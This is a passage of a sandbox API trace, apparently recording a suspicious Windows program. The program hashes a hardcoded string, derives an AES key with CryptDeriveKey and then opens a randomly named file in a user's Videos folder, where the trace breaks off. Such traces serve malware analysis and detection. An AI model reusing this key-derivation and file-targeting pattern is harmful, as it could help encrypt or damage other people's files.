(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b48 [0101.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0101.113] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43caca0 [0101.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caca0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.115] CryptHashData (hHash=0x41ac140, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0101.116] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0101.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0101.117] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0101.117] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.117] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0101.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cac28 [0101.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.120] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac540) returned 1 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.120] CryptDestroyHash (hHash=0x41ac140) returned 1 [0101.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T 